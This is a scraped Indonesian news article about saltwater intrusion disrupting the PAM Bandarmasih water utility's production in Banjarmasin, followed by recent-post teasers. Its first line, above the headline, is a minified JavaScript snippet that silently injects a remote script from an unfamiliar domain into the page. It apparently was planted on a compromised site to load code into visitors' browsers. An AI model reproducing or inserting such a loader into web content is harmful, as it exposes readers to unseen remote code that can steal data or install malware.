(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Kadar Garam di Intake Sungai Bilu Tinggi, Produksi Air PAM Bandarmasih Terganggu


KANALKALIMANTAN.COM, BANJARMASIN – Musim kemarau mengakibatkan kadar garam atau intrusi air laut meningkat di Sungai Martapura.

Peningkatan kadar garam itu berdampak terhadap produksi air baku PAM Bandarmasih khususnya di Intake Sungai Bilu, Banjarmasin. Sehingga pelanggan yang berada di ujung jaringan pipa distribusi diimbau untuk menyiapkan penampungan air.

Imbauan itu juga berdasarkan hasil pengujian kadar klorida yang dilakukan tim PAM Bandarmasih pada 26 Agustus hingga 10 September 2023 pukul 15.00 Wita.

Data hasil pengukuran PAM Bandarmasih terakhir pada Senin (11/9/2023) pukul 15.00 Wita, menunjukan kadar klorida di Intake Sungai Bilu masih tinggi yaitu berada di angka 923,47 Mg/L.

Baca juga: Penyusunan RPJPD 2025-2050, Ini Kata Sekda HSU

Angka itu lebih rendah jika dibandingkan pengujian pada Minggu (10/9/2023) dengan angka 1446,36 Mg/L, dan sehari sebelumnya di angka 1233,66 Mg/L.

Sementara itu, batas aman konsentrasi klorida (CI-) dalam air minum yang direkomendasikan menurut Peraturan Menteri Kesehatan RI Nomor 492/MENKES/PER/IV/2010 yaitu 250 mg/L.

Untuk itu, PAM Bandarmasih mengimbau kepada pelanggan terutama yang berada di ujung jaringan atau pinggiran agar menyiapkan menyediakan atau menyimpan air dalam penampungan sebagai antisipasi jika sewaktu-waktu air bersih tidak mengalir.

Baca juga: Dua Hari Api Berkobar di Abumbun Jaya, Majelis Taklim Nyaris Terbakar

“Sehubungan meningkatkan kadar garam intrusi air laut, kami mengimbau kepada seluruh pelanggan PAM Bandarmasih khususnya diwilayah ujung jaringan agar bisa menyiapkan penampungan guna mengantisipasi sewaktu-waktu terjadinya penurunan distribusi sampai dengan mati total,” imbau Humas PAM Bandarmasih, Selasa (12/9/2023) siang.

Bagi pelanggan yang memerlukan air dengan mobil tangki bisa menghubungi Call Center PDAM Bandarmasih 0511 3252541 atau WhatsApp Center 0811-5151-46. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

22 menit ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

51 menit ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

2 jam ago

Nurgita Tiyas Berharap Guru Dapat Lebih Cakap Digital

KANALKALIMANTAN.COM, BANJARMASIN - Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas menghadiri Talkshow Literasi Digital… Read More

2 jam ago

Srikandi PLN UPT Palangkaraya Mengajar di SDN 5 Bukit Tunggal

KANALKALIMANTAN.COM, PALANGKARAYA – PT PLN (Persero) Unit Pelaksana Transmisi (UPT) Palangkaraya melalui gugus tugas Srikandi… Read More

5 jam ago

Pemkab HSU Gelar Peringatan Harkitnas

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan memimpin upacara peringatan… Read More

5 jam ago

This website uses cookies.